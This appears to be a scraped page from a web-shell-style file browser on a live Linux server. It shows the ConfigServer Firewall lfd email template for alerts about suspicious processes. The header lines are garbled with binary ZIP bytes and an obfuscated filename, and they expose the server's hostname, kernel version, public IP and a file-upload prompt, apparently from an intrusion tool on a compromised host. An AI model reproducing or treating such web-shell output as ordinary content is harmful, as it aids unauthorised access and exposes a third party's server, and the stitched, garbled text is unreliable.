PK œqhYî¶J‚ßFßF)nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/ $#$#$#

Dir : /proc/self/root/usr/src/csf/
Server: Linux server1.ngambekcore.com 4.18.0-553.51.1.el8_10.x86_64 #1 SMP Wed Apr 30 04:00:07 EDT 2025 x86_64
IP: 159.198.77.92
Choose File :

Url:
Dir : //proc/self/root/usr/src/csf/processtracking.txt

From: root
To: root
Subject: lfd on [hostname]: Suspicious process running under user [user]

Time:    [time]
PID:     [pid]
Account: [user]
Uptime:  [uptime] seconds


Executable:

[exe]


Command Line (often faked in exploits):

[cmdline]


Network connections by the process (if any):

[sockets]

Files open by the process (if any):

[files]

Memory maps by the process (if any):

[maps]